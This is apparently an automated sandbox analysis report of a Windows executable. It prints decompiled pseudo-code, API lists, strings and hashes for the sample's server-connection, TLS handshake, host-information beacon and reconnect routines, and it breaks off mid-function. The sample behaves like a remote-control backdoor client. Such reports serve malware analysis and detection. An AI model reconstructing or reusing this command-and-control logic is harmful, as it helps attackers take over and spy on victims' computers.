                    				_t773 = _t772 + 0x30;
                    				_t191 = E00401E65( &_v16, _t684, _t766, _t793, 1);
                    				E00401FE2(0x4745b4, _t193, _t759, E00402F10(_t418,  &_v40, E00406B45( &_v64, E00401E65( &_v16, _t684, _t766, _t793, 0), _t766, 0x46b654), _t766, _t793, _t191));
                    				E00401FD8();
                    				E00401FD8();
                    				E00401E65( &_v16, _t193, _t766, _t793, 2);
                    				_t687 = "0";
                    				_t199 = E00405B05("0");
                    				_t446 =  &_v100;
                    				_t794 = _t199;
                    				if(_t199 == 0) {
                    					 *0x471ae4 = 1;
                    					_push("TLS On ");
                    				} else {
                    					 *0x471ae4 = 0;
                    					_push("TLS Off");
                    				}
                    				L00405AA6(_t418, _t446, _t687);
                    				_t774 = _t773 - 0x18;
                    				E00402F10(_t418, _t774, E00406383(_t418,  &_v40, E0040531E( &_v64, "Connecting  | ", _t766,  &_v100), _t755, _t766, _t794, " | "), _t766, _t794, 0x4745b4);
                    				_t775 = _t774 - 0x14;
                    				E00402093(_t418, _t775, _t203, _t766, "i");
                    				E0041AF84(_t418, _t755);
                    				_t770 = _t775 + 0x30;
                    				E00401FD8();
                    				E00401FD8();
                    				_t210 = E00401FAB(E00401E65( &_v16, _t203, _t766, _t794, 1));
                    				_t212 = E00401FAB(E00401E65( &_v16, _t203, _t766, _t794, 0));
                    				_t684 = _t210;
                    				_t213 = E00414AF6(_t212, _t210,  &_v64,  &_v64);
                    				_t795 = _t213;
                    				if(_t213 == 0) {
                    					_t759 = 0x474580;
                    					_t214 = E0040482D(0x474580);
                    					__eflags = _t214;
                    					if(_t214 != 0) {
                    						E00404F51(0x474580, 0x3c, 0); // executed
                    						_t216 = E004048C8(0x474580, 0x474580, 0x474580); // executed
                    						__eflags = _t216;
                    						if(__eflags != 0) {
                    							_t224 = E00401E65( &_v16, _t684, _t766, __eflags, 1);
                    							_t776 = _t770 - 0x18;
                    							_t225 = E00401E65( &_v16, _t684, _t766, __eflags, 0);
                    							_t695 = E00406383(_t418,  &_v124, E00402F10(_t418,  &_v208, E00406383(_t418,  &_v232, E0040531E( &_v256, "Connected   | ", _t766,  &_v100), _t755, _t766, __eflags, " | "), _t766, __eflags, _t225), _t755, _t766, __eflags, 0x46b654);
                    							E00402F10(_t418, _t776, _t695, _t766, __eflags, _t224);
                    							_t777 = _t776 - 0x14;
                    							E00402093(_t418, _t777, _t695, _t766, "i");
                    							E0041AF84(_t418, _t755);
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							_v160 = 0;
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd"); // executed
                    							_t239 = E0041B275( &_v256); // executed
                    							_push(_t695);
                    							E004141CA( &_v160, "%I64u", _t239);
                    							E00408F83(_t418,  &_v40, _t695, __eflags, 0x474140);
                    							E00441861( &_v40,  *0x4709d0,  &_v136, 0xa);
                    							E004020F6(_t418,  &_v184, _t695, __eflags, E00401E65(0x4740cc, _t695, _t766, __eflags, 1));
                    							_t247 = E0040247C();
                    							_t248 = E00401FAB(0x474320);
                    							_t490 = 0x4742d8;
                    							_t696 = E00401FAB(0x4742d8); // executed
                    							_t251 = E004132A6(_t250, "name",  &_v2604, 0x104, _t248, _t247); // executed
                    							_t781 = _t777 + 0x60;
                    							__eflags = _t251;
                    							if(_t251 != 0) {
                    								_t490 =  &_v184;
                    								L00405AA6(_t418, _t490, _t696,  &_v2604);
                    							}
                    							_push(_t490);
                    							E00413154( &_v64, 0x80000001, E00401FAB(0x4742d8), "hlight");
                    							_t254 =  *0x471d58; // 0x0
                    							_t782 = _t781 + 0xc;
                    							_t757 = 0;
                    							__eflags = _t254;
                    							if(__eflags != 0) {
                    								_t757 =  *_t254() & 0x0000ffff;
                    							}
                    							E0040417E(_t418,  &_v124, 0x80000001, _t766, "C:\Users\hardz\Desktop\BiU282bjyR.exe"); // executed
                    							_t256 = E0040DB92(__eflags); // executed
                    							_t257 = E0041B6D7( &_v1576, _t256);
                    							_t783 = _t782 - 0x18;
                    							_t260 = E0041B7B3(_t418,  &_v1552, 0x4742c0);
                    							_t261 = E0041B623(_t418,  &_v1528, _t757 & 0x0000ffff);
                    							_t262 = E00401E65( &_v16, _t757 & 0x0000ffff, _t766, __eflags, 0);
                    							_t265 = E0041B623(_t418,  &_v1504, GetTickCount());
                    							_t267 = E0041B623(_t418,  &_v1480, E0041B57B( &_v1504));
                    							_t703 =  *0x474124; // 0x0
                    							_t268 = E0041B623(_t418,  &_v1456, _t703);
                    							_t269 = E0041B52B(_t418,  &_v1432, 0x473ec8); // executed
                    							_t270 = E0041B7B3(_t418,  &_v1408, _t269);
                    							_t271 = E0041B7B3(_t418,  &_v1384, 0x473d4c);
                    							_t272 = E0041B7B3(_t418,  &_v1360,  &_v124);
                    							_t273 = E0041B7B3(_t418,  &_v1336,  &_v40);
                    							_t275 = E0041B7B3(_t418,  &_v1312, 0x4746b0);
                    							_t276 = E0040F6DA( &_v1288);
                    							_t277 = E0041B7B3(_t418,  &_v1264, 0x474338);
                    							_t684 = E00402F10(_t418,  &_v256, E00402F10(_t418,  &_v232, E00402F10(_t418,  &_v208, E00402F10(_t418,  &_v304, E00402F10(_t418,  &_v328, E00402F10(_t418,  &_v352, E00402F10(_t418,  &_v376, E00402EA1( &_v400, E00402F10(_t418,  &_v424, E00402EA1( &_v448, E00402F10(_t418,  &_v472, E00402F10(_t418,  &_v496, E00402F10(_t418,  &_v520, E00402F10(_t418,  &_v544, E00402F10(_t418,  &_v568, E00406383(_t418,  &_v592, E00402F10(_t418,  &_v616, E00402EA1( &_v640, E00402F10(_t418,  &_v664, E00402EA1( &_v688, E00402F10(_t418,  &_v712, E00402EA1( &_v736, E00402F10(_t418,  &_v760, E00402EA1( &_v784, E00402F10(_t418,  &_v808, E00402EA1( &_v832, E00402F10(_t418,  &_v856, E00402EA1( &_v880, E00402F10(_t418,  &_v904, E00402EA1( &_v928, E00402F10(_t418,  &_v952, E00406383(_t418,  &_v976, E00402F10(_t418,  &_v1000, E00406383(_t418,  &_v1024, E00402F10(_t418,  &_v1048, E00402EA1( &_v1072, E00402F10(_t418,  &_v1096, E00402F10(_t418,  &_v1120, E00402F10(_t418,  &_v1144, E00402EA1( &_v1168, E00402F10(_t418,  &_v1192, E00402EA1( &_v1216, E00402F31( &_v1240,  &_v184, _t766, 0x473ec8), _t277), _t766, __eflags, 0x473ec8), _t276), _t766, __eflags, 0x473ec8), _t766, __eflags, 0x4749e8), _t766, __eflags, 0x473ec8), _t275), _t766, __eflags, 0x473ec8), 0x473ec8, _t766, __eflags,  &_v160), _t766, __eflags, 0x473ec8), 0x473ec8, _t766, __eflags, "4.8.0 Pro"), _t766, __eflags, 0x473ec8), _t273), _t766, __eflags, 0x473ec8), _t272), _t766, __eflags, 0x473ec8), _t271), _t766, __eflags, 0x473ec8), _t270), _t766, __eflags, 0x473ec8), _t268), _t766, __eflags, 0x473ec8), _t267), _t766, __eflags, 0x473ec8), _t265), _t766, __eflags, 0x473ec8), 0x473ec8, _t766, __eflags,  &_v136), _t766, __eflags, 0x473ec8), _t766, __eflags, _t262), _t766, __eflags, 0x473ec8), _t766, __eflags, "EGiy6hf-YWJYTZ"), _t766, __eflags, 0x473ec8), _t261), _t766, __eflags, 0x473ec8), _t260), _t766, __eflags, 0x473ec8), _t766, __eflags,  &_v280), _t766, __eflags, 0x473ec8), _t766, __eflags, "Exe"), _t766, __eflags, 0x473ec8), _t766, __eflags,  &_v64), _t766, __eflags, 0x473ec8);
                    							E00402EA1(_t783, _t320, _t257);
                    							_t759 = 0x474580;
                    							_push(0x4b);
                    							E00404AA1(0x474580, _t320, __eflags); // executed
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    							E00404C10(0x474580, _t320, E004156F7, 1);
                    							_t382 =  *0x471d5c; // 0x0
                    							__eflags = _t382;
                    							if(_t382 != 0) {
                    								__eflags =  *0x471d4a;
                    								if( *0x471d4a != 0) {
                    									_t382 =  *_t382();
                    									 *0x471d4a = 0;
                    								}
                    							}
                    							__eflags =  *0x474122;
                    							if( *0x474122 != 0) {
                    								_t382 = E0040AEC6(_t418, 0x4740d8, _t684);
                    							}
                    							E00405A6B(_t382);
                    							_t784 = _t783 - 0x18;
                    							E00402093(_t418, _t784, _t684, _t766, "Disconnected");
                    							_t785 = _t784 - 0x18;
                    							E00402093(_t418, _t785, _t684, _t766, "!");
                    							E0041AF84(_t418, 0x473ec8);
                    							_t770 = _t785 + 0x30;
                    							__eflags =  *0x473ad3;
                    							if( *0x473ad3 != 0) {
                    								__eflags = 0;
                    								CreateThread(0, 0, E0041A7AC, 0, 0, 0);
                    							}
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    							_t755 = 0x4740cc;
                    						}
                    					} else {
                    						_t786 = _t770 - 0x18;
                    						E00402093(_t418, _t786, _t684, _t766, "Connection Error: Unable to create socket");
                    						_t787 = _t786 - 0x18;
                    						E00402093(_t418, _t787, _t684, _t766, "E");
                    						E0041AF84(_t418, _t755);
                    						_t770 = _t787 + 0x30;
                    					}
                    				} else {
                    					__imp__#111();
                    					_t398 = E0041C576( &_v40, _t213);
                    					_t788 = _t770 - 0x18;
                    					_t684 = "Connection Error: ";
                    					E004052FD(_t418, _t788, "Connection Error: ", _t766, _t795, _t398);
                    					_t789 = _t788 - 0x14;
                    					E00402093(_t418, _t789, "Connection Error: ", _t766, "E");
                    					E0041AF84(_t418, _t755);
                    					_t770 = _t789 + 0x30;
                    					E00401FD8();
                    					_t759 = 0x474580;
                    				}
                    				E00404E26(_t684);
                    				_t418 =  &(_t418->nLength);
                    				_t218 = E004021FA( &_v76);
                    				_t796 = _t418 - _t218;
                    				if(_t418 >= _t218) {
                    					_t418 = 0;
                    					_t223 = E0043B4A1(_t220, E00401FAB(E00401E65(_t755, _t684, _t766, _t796, 2))) * 0x3e8;
                    					_t793 = _t223;
                    					Sleep(_t223);
                    				}
                    				E00401E8D( &_v16, _t684);
                    				goto L4;
                    			}





















































































































































                    0x00414b43
                    0x00414b44
                    0x00414b46
                    0x00414b51
                    0x00414b5c
                    0x00414b61
                    0x00414b77
                    0x00414b7f
                    0x00414b81
                    0x00414b81
                    0x00414b88
                    0x00414b88
                    0x00414b8e
                    0x00414b98
                    0x00414ba1
                    0x00414ba6
                    0x00414bac
                    0x00414bb4
                    0x00414bb9
                    0x00414bbc
                    0x00414bbe
                    0x00414bc7
                    0x00414bcc
                    0x00414bd3
                    0x00414bd8
                    0x00414bda
                    0x00414be0
                    0x00414be7
                    0x00414bf8
                    0x00414c02
                    0x00414c09
                    0x00414c1a
                    0x00414c24
                    0x00414c2b
                    0x00414c34
                    0x00414c3d
                    0x00414c42
                    0x00414c46
                    0x00414c4b
                    0x00414c4b
                    0x00414c4e
                    0x00414c4e
                    0x00414c51
                    0x00414c5f
                    0x00414c68
                    0x00414c6d
                    0x00414c73
                    0x00414c7b
                    0x00414c80
                    0x00414c88
                    0x00414cb9
                    0x00414cc1
                    0x00414cc9
                    0x00414cd3
                    0x00414cd8
                    0x00414cdf
                    0x00414ce4
                    0x00414ce7
                    0x00414ce9
                    0x00414cf9
                    0x00414d00
                    0x00414ceb
                    0x00414ceb
                    0x00414cf2
                    0x00414cf2
                    0x00414d05
                    0x00414d0a
                    0x00414d3a
                    0x00414d3f
                    0x00414d49
                    0x00414d4e
                    0x00414d53
                    0x00414d59
                    0x00414d61
                    0x00414d74
                    0x00414d87
                    0x00414d8c
                    0x00414d90
                    0x00414d95
                    0x00414d97
                    0x00414de2
                    0x00414de9
                    0x00414dee
                    0x00414df0
                    0x00414e23
                    0x00414e2b
                    0x00414e30
                    0x00414e32
                    0x00414e3d
                    0x00414e42
                    0x00414e52
                    0x00414e99
                    0x00414e9d
                    0x00414ea2
                    0x00414eac
                    0x00414eb1
                    0x00414ebc
                    0x00414ec7
                    0x00414ed2
                    0x00414edd
                    0x00414ee2
                    0x00414ef1
                    0x00414ef2
                    0x00414ef3
                    0x00414ef4
                    0x00414ef5
                    0x00414ef6
                    0x00414efb
                    0x00414f09
                    0x00414f19
                    0x00414f2d
                    0x00414f48
                    0x00414f54
                    0x00414f5c
                    0x00414f78
                    0x00414f7f
                    0x00414f81
                    0x00414f86
                    0x00414f89
                    0x00414f8b
                    0x00414f94
                    0x00414f9a
                    0x00414f9a
                    0x00414f9f
                    0x00414fb5
                    0x00414fba
                    0x00414fbf
                    0x00414fc2
                    0x00414fc4
                    0x00414fc6
                    0x00414fca
                    0x00414fca
                    0x00414fd5
                    0x00414fda
                    0x00414fe7
                    0x00414fec
                    0x00415016
                    0x0041502a
                    0x00415041
                    0x0041505e
                    0x00415072
                    0x00415077
                    0x00415085
                    0x00415092
                    0x0041509f
                    0x004150b1
                    0x004150c1
                    0x004150d1
                    0x004150f1
                    0x00415104
                    0x00415116
                    0x0041537b
                    0x0041537f
                    0x00415385
                    0x0041538a
                    0x0041538e
                    0x00415399
                    0x004153a4
                    0x004153af
                    0x004153ba
                    0x004153c5
                    0x004153d0
                    0x004153db
                    0x004153e6
                    0x004153f1
                    0x004153fc
                    0x00415407
                    0x00415412
                    0x0041541d
                    0x00415428
                    0x00415433
                    0x0041543e
                    0x00415449
                    0x00415454
                    0x0041545f
                    0x0041546a
                    0x00415475
                    0x00415480
                    0x0041548b
                    0x00415496
                    0x004154a1
                    0x004154ac
                    0x004154b7
                    0x004154c2
                    0x004154cd
                    0x004154d8
                    0x004154e3
                    0x004154ee
                    0x004154f9
                    0x00415504
                    0x0041550f
                    0x0041551a
                    0x00415525
                    0x00415530
                    0x0041553b
                    0x00415546
                    0x00415551
                    0x0041555c
                    0x00415567
                    0x00415572
                    0x0041557d
                    0x00415588
                    0x00415593
                    0x0041559e
                    0x004155a9
                    0x004155b4
                    0x004155bf
                    0x004155ca
                    0x004155d5
                    0x004155e0
                    0x004155eb
                    0x004155f6
                    0x00415601
                    0x00415609
                    0x00415617
                    0x0041561c
                    0x00415621
                    0x00415623
                    0x00415625
                    0x0041562c
                    0x0041562e
                    0x00415630
                    0x00415630
                    0x0041562c
                    0x00415637
                    0x0041563e
                    0x00415645
                    0x00415645
                    0x0041564a
                    0x0041564f
                    0x00415659
                    0x0041565e
                    0x00415668
                    0x0041566d
                    0x00415672
                    0x00415675
                    0x0041567c
                    0x0041567e
                    0x0041568a
                    0x0041568a
                    0x00415693
                    0x0041569e
                    0x004156a6
                    0x004156ab
                    0x004156ab
                    0x00414df2
                    0x00414df2
                    0x00414dfc
                    0x00414e01
                    0x00414e0b
                    0x00414e10
                    0x00414e15
                    0x00414e15
                    0x00414d99
                    0x00414d99
                    0x00414da4
                    0x00414da9
                    0x00414dac
                    0x00414db4
                    0x00414db9
                    0x00414dc3
                    0x00414dc8
                    0x00414dcd
                    0x00414dd3
                    0x00414dd8
                    0x00414dd8
                    0x004156b2
                    0x004156ba
                    0x004156bb
                    0x004156c0
                    0x004156c2
                    0x004156c8
                    0x004156dc
                    0x004156dc
                    0x004156e4
                    0x004156e4
                    0x004156ed
                    0x00000000

                    APIs
                    • Sleep.KERNEL32(00000000,00000029,004742D8,X2},00000000), ref: 00414B88
                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 00414D99
                    • Sleep.KERNEL32(00000000,00000002), ref: 004156E4
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ErrorLastLocalTime
                    • String ID: CG$ | $%I64u$4.8.0 Pro$8CG$C:\Users\user\Desktop\BiU282bjyR.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$EGiy6hf-YWJYTZ$Exe$L=G$TLS Off$TLS On $X2}$hlight$name
                    • API String ID: 524882891-1566769511
                    • Opcode ID: 226a6c3fa6e42f98bd998e9682bfbe008ea77837db2afdb59e569a5bec39388b
                    • Instruction ID: a992723a00ebb95cce7dab3336327d60e511e5d97341dcc71be0638f29b130c0
                    • Opcode Fuzzy Hash: 226a6c3fa6e42f98bd998e9682bfbe008ea77837db2afdb59e569a5bec39388b
                    • Instruction Fuzzy Hash: C5526B31A001155ACB18F732DD56AEEB3759F90348F5044BFE40AB71E2EF781E868A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 73%
                    			E004048C8(void* __ecx, void* __esi) {
                    				char _v32;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr _t21;
                    				int _t22;
                    				void* _t26;
                    				signed int _t31;
                    				void* _t32;
                    				void* _t33;
                    				struct _SECURITY_ATTRIBUTES* _t34;
                    				void* _t42;
                    				void* _t43;
                    				void* _t51;
                    				struct _SECURITY_ATTRIBUTES* _t56;
                    				void* _t58;
                    				void* _t81;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				void* _t86;
                    				void* _t87;
                    				void* _t103;
                    				void* _t104;
                    
                    				_t84 = __esi;
                    				_t21 =  *0x471adc; // 0x7be108
                    				_t87 = _t86 - 0x1c;
                    				_t1 = _t21 + 0x10; // 0x10
                    				_t82 = __ecx;
                    				_t2 = _t21 + 0x18; // 0x7d7ac8
                    				_t3 = _t82 + 4; // 0xffffffff, executed
                    				__imp__#4( *_t3,  *_t2,  *_t1, _t81, _t51); // executed
                    				if(_t21 != 0) {
                    					__eflags =  *((char*)(__ecx + 0x31));
                    					if( *((char*)(__ecx + 0x31)) != 0) {
                    						__imp__#111();
                    						_t56 = _t21 - 0x2736;
                    						__eflags = _t56;
                    						if(_t56 != 0) {
                    							__eflags = _t56 == 0x17;
                    							if(_t56 == 0x17) {
                    								_t88 = _t87 - 0x18;
                    								_t58 = _t87 - 0x18;
                    								_push("Connection Refused");
                    								goto L20;
                    							} else {
                    								_t26 = E0041C576( &_v32, _t21);
                    								_t91 = _t87 - 0x18;
                    								E004052FD(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
                    								E00402093(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
                    								E0041AF84(_t51, _t82);
                    								E00401FD8();
                    							}
                    						}
                    					}
                    					goto L21;
                    				} else {
                    					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
                    						L14:
                    						_t22 = 1;
                    					} else {
                    						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
                    							_t103 = _t87 - 0x18;
                    							_t6 = _t82 + 0x34; // 0x473f14
                    							_t77 = "TLS Handshake...      | ";
                    							E0040531E(_t103, "TLS Handshake...      | ", _t85, _t6);
                    							_t104 = _t103 - 0x14;
                    							E00402093(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
                    							E0041AF84(_t51, _t82);
                    							_t87 = _t104 + 0x30;
                    						}
                    						_t31 = E0042067E(_t51);
                    						 *(_t82 + 0x4c) = _t31;
                    						if(_t31 != 0) {
                    							_t8 = _t82 + 4; // 0xffffffff
                    							_t80 =  *_t8;
                    							_t32 = E004208AD(_t31,  *_t8);
                    							__eflags = _t32 - 1;
                    							if(_t32 == 1) {
                    								_t33 = E0042145E();
                    								__eflags = _t33 - 1;
                    								if(_t33 == 1) {
                    									_t34 = E00420824(_t51);
                    									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
                    									__eflags = _t34;
                    									if(_t34 == 0) {
                    										_t94 = _t87 - 0x18;
                    										E00402093(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
                    										E00402093(_t51, _t94 - 0x18, _t80, _t85, "E");
                    										E0041AF84(_t51, _t82);
                    									}
                    									__eflags = 0;
                    									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
                    									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
                    									goto L14;
                    								} else {
                    									_t97 = _t87 - 0x18;
                    									E00402093(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
                    									E00402093(_t51, _t97 - 0x18, _t80, _t85, "E");
                    									_t42 = E0041AF84(_t51, _t82);
                    									_t13 = _t82 + 0x4c; // 0x0
                    									_t43 = E00420AD0(_t42,  *_t13);
                    									goto L8;
                    								}
                    							} else {
                    								_t100 = _t87 - 0x18;
                    								E00402093(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
                    								E00402093(_t51, _t100 - 0x18, _t80, _t85, "E");
                    								_t43 = E0041AF84(_t51, _t82);
                    								L8:
                    								_t9 = _t82 + 0x4c; // 0x0
                    								E004206BE(_t43, _t51,  *_t9, _t80, _t82, _t84);
                    								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
                    								goto L21;
                    							}
                    						} else {
                    							_t88 = _t87 - 0x18;
                    							_t58 = _t87 - 0x18;
                    							_push("TLS Error 1");
                    							L20:
                    							E00402093(_t51, _t58, _t77, _t85);
                    							E00402093(_t51, _t88 - 0x18, _t77, _t85, "E");
                    							E0041AF84(_t51, _t82);
                    							L21:
                    							_t22 = 0;
                    						}
                    					}
                    				}
                    				return _t22;
                    			}



























                    0x004048c8
                    0x004048cb
                    0x004048d0
                    0x004048d5
                    0x004048d8
                    0x004048da
                    0x004048dd
                    0x004048e0
                    0x004048e8
                    0x00404a1b
                    0x00404a1f
                    0x00404a21
                    0x00404a29
                    0x00404a29
                    0x00404a2f
                    0x00404a31
                    0x00404a34
                    0x00404a71
                    0x00404a74
                    0x00404a76
                    0x00000000
                    0x00404a36
                    0x00404a3b
                    0x00404a40
                    0x00404a4b
                    0x00404a5a
                    0x00404a5f
                    0x00404a6a
                    0x00404a6a
                    0x00404a34
                    0x00404a2f
                    0x00000000
                    0x004048ee
                    0x004048f1
                    0x00404a17
                    0x00404a17
                    0x004048f7
                    0x004048fa
                    0x004048fc
                    0x004048ff
                    0x00404904
                    0x0040490a
                    0x0040490f
                    0x00404919
                    0x0040491e
                    0x00404923
                    0x00404923
                    0x00404926
                    0x0040492b
                    0x00404930
                    0x00404941
                    0x00404941
                    0x00404946
                    0x0040494b
                    0x0040494e
                    0x0040498a
                    0x0040498f
                    0x00404992
                    0x004049c7
                    0x004049cc
                    0x004049cf
                    0x004049d1
                    0x004049d3
                    0x004049dd
                    0x004049ec
                    0x004049f1
                    0x004049f6
                    0x004049f9
                    0x00404a0b
                    0x00404a14
                    0x00000000
                    0x00404994
                    0x00404994
                    0x0040499e
                    0x004049ad
                    0x004049b2
                    0x004049b7
                    0x004049bd
                    0x00000000
                    0x004049bd
                    0x00404950
                    0x00404950
                    0x0040495a
                    0x00404969
                    0x0040496e
                    0x00404976
                    0x00404976
                    0x00404979
                    0x0040497e
                    0x00000000
                    0x0040497e
                    0x00404932
                    0x00404932
                    0x00404935
                    0x00404937
                    0x00404a7b
                    0x00404a7b
                    0x00404a8a
                    0x00404a8f
                    0x00404a97
                    0x00404a97
                    0x00404a97
                    0x00404930
                    0x004048f1
                    0x00404a9e

                    APIs
                    • connect.WS2_32(FFFFFFFF,007D7AC8,00000010), ref: 004048E0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                    • WSAGetLastError.WS2_32 ref: 00404A21
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                    • API String ID: 994465650-2151626615
                    • Opcode ID: 3add7357fe697e769bdbbc31fe4c4fe25d7176621c648c60be3c93177ce61e7f
                    • Instruction ID: 8177a25ec48880dba2e66a904bd92799207505acd315fdd83a721b0ea9de3c20
                    • Opcode Fuzzy Hash: 3add7357fe697e769bdbbc31fe4c4fe25d7176621c648c60be3c93177ce61e7f
                    • Instruction Fuzzy Hash: C241EBB574020167DB1477BB890B52EBA55ABC1308B50017FE60266AD3EF7D9C218BEF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1000 40d83d-40d862 call 401f86 1003 40d868 1000->1003 1004 40d98c-40d9b2 call 401f04 GetLongPathNameW call 40417e 1000->1004 1006 40d961-40d966 1003->1006 1007 40d8a4-40d8a9 1003->1007 1008 40d977 1003->1008 1009 40d968-40d975 call 43ba8f 1003->1009 1010 40d879-40d887 call 41b049 call 401f13 1003->1010 1011 40d89a-40d89f 1003->1011 1012 40d95a-40d95f 1003->1012 1013 40d8ae-40d8b5 call 41ba4c 1003->1013 1014 40d86f-40d874 1003->1014 1025 40d9b7-40da24 call 40417e call 40dbda call 402fa5 * 2 call 401f09 * 5 1004->1025 1016 40d97c-40d981 call 43ba8f 1006->1016 1007->1016 1008->1016 1009->1008 1028 40d982-40d987 call 408f7e 1009->1028 1035 40d88c 1010->1035 1011->1016 1012->1016 1026 40d8b7-40d907 call 40417e call 43ba8f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1013->1026 1027 40d909-40d955 call 40417e call 43ba8f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1013->1027 1014->1016 1016->1028 1036 40d890-40d895 call 401f09 1026->1036 1027->1035 1028->1004 1035->1036 1036->1004
                    C-Code - Quality: 86%
                    			E0040D83D(void* __ecx, void* __edx, intOrPtr _a4) {
                    				char _v524;
                    				char _v544;
                    				char _v560;
                    				char _v572;
                    				void* _v576;
                    				char _v580;
                    				char _v584;
                    				char _v600;
                    				char _v608;
                    				char _v616;
                    				char _v620;
                    				void* _v624;
                    				char _v628;
                    				char _v632;
                    				char _v636;
                    				char _v644;
                    				void* _v648;
                    				char _v652;
                    				void* _v672;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t36;
                    				void* _t39;
                    				void* _t40;
                    				void* _t77;
                    				void* _t82;
                    
                    				_t73 = __edx;
                    				_t77 = __ecx;
                    				_t54 = __edx;
                    				E00401F86(__edx,  &_v644);
                    				_t36 = __edx + 0xffffffd0;
                    				_t86 = _t36 - 8;
                    				if(_t36 <= 8) {
                    					switch( *((intOrPtr*)(_t36 * 4 +  &M0040DA25))) {
                    						case 0:
                    							_push(L"Temp");
                    							goto L15;
                    						case 1:
                    							__ecx =  &_v620;
                    							__eax = E0041B049(__ebx,  &_v620, __edx);
                    							__ecx =  &_v644;
                    							__eax = E00401F13( &_v644, __edx, __esi, __eax);
                    							goto L4;
                    						case 2:
                    							_push(L"SystemDrive");
                    							goto L15;
                    						case 3:
                    							_push(L"WinDir");
                    							goto L15;
                    						case 4:
                    							__eax = E0041BA4C(__ecx);
                    							__eflags = __al;
                    							if(__eflags != 0) {
                    								__ecx =  &_v620;
                    								E0040417E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E0043BA8F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v580;
                    								__eax = E00402FA5( &_v580, __edx, __eax);
                    								__ecx =  &_v652;
                    								__eax = E00401F13( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v584;
                    								__eax = E00401F09();
                    								__ecx =  &_v608;
                    								__eax = E00401F09();
                    								L4:
                    								__ecx =  &_v620;
                    								goto L5;
                    							} else {
                    								__ecx =  &_v572;
                    								E0040417E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E0043BA8F(__ebx, __ecx, __eflags, L"WinDir");
                    								__ecx =  &_v600;
                    								__edx = __eax;
                    								__ecx =  &_v628;
                    								__eax = E00402FA5( &_v628, __edx, __eax);
